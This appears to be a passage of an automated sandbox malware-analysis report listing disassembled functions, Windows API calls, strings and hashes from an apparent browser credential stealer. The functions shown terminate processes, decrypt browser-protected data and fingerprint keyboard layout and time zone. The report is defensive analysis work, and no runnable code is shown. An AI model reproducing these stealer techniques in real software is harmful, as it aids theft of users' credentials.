                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressLibraryProc$FreeLoad
                                                                                                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2256533930-1545816527
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 41317d004e32df3368e0b40b2df30f060e9b3f1c7a199a11b2b6647de007d5a9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57F01DB4E0E324EFD7009B60ED48B563BA6E318341F506437F505AB2E0E3B85494CB6B
                                                                                                                                                                                                                                                                                                                                  Function 004198E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00419905
                                                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00409FDE,00000128), ref: 00419919
                                                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00409FDE,00000128), ref: 0041992E
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00409FDE), ref: 00419943
                                                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041995C
                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041997A
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00419987
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00409FDE), ref: 00419993
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2696918072-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9e175830caf9148bd7a219e001ec971bef60eefc02138b6d75eb658f8e5d4480
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94112EB5E15218ABCB24DFA0DC48BDEB7B9BB48700F00558DF509A6240EB749B84CF91
                                                                                                                                                                                                                                                                                                                                  Function 0040A560 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 155memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 0040A5D2
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040A60B
                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 0040A664
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: memcmp$AllocLocallstrcpymemset
                                                                                                                                                                                                                                                                                                                                  • String ID: @$v10$v20
                                                                                                                                                                                                                                                                                                                                  • API String ID: 631489823-278772428
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 139f62b83883199d39b70884f6b2d17834cc6e236b2a0d4142a50b824dfcdcad
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: deead5598e30f73acd49a71965db0b9c26184f2a73657d717c04d8255e3e8135
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 139f62b83883199d39b70884f6b2d17834cc6e236b2a0d4142a50b824dfcdcad
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C518E30610208EFCB14EFA5DD95FDD7775AF40304F008029F90A6F291DB78AA55CB5A
                                                                                                                                                                                                                                                                                                                                  Function 00417D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
                                                                                                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00417EB2
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3090951853-4001269591
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 615ecc87d4b925db935f77469e47db3c52313f5f9c32c9bc9a21744164e785a3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3a7f69f4b1fea99afaf6d133ce9a777b30b3333c02d8fb4e8698743120f63e4e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 615ecc87d4b925db935f77469e47db3c52313f5f9c32c9bc9a21744164e785a3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C416D71945218ABCB24DB94DC99BEEB374FF44704F2041DAE10A62280DB386FC4CFA9
                                                                                                                                                                                                                                                                                                                                  Function 00419790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004197AE
                                                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00420ACE,00000128), ref: 004197C2
                                                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00420ACE,00000128), ref: 004197D7
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 004197EC
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00420ACE), ref: 0041980A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1fbe04e52da5ee7ffdaa7b0a109f2e7c212eef70923f216ae4cda371332784c4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49010C75E15209EBDB20DFA4CD54BDEB7B9BB08700F14469AE50996240E7349F80CF61
                                                                                                                                                                                                                                                                                                                                  Function 00418810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
                                                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(?,00000128), ref: 0041886E
                                                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(?,00000128), ref: 00418883
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004188F1
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1066202413-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 76fd94ff64006d5457097e98ba5ab0f82bc15772a1c362025e5ef6902c5575f3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f2962352e5a9518fad6621e76df9ccdb14d3c152e16a9ee82315e1f5505f4b94
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76fd94ff64006d5457097e98ba5ab0f82bc15772a1c362025e5ef6902c5575f3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E318171A02158ABCB24DF55DC55FEEB378EF04714F50419EF10A62190EB386B84CFA5
                                                                                                                                                                                                                                                                                                                                  Function 0040A2B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0040A316
                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 0040A323
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3243516280-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3611ACB4900209DFCB04DF94D988AAE77B5FF88300F104559ED15A7350D734AE50CF61
                                                                                                                                                                                                                                                                                                                                  Function 00417BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,007A0890,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,007A0890,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
                                                                                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,007A0890,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
                                                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00417C47
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
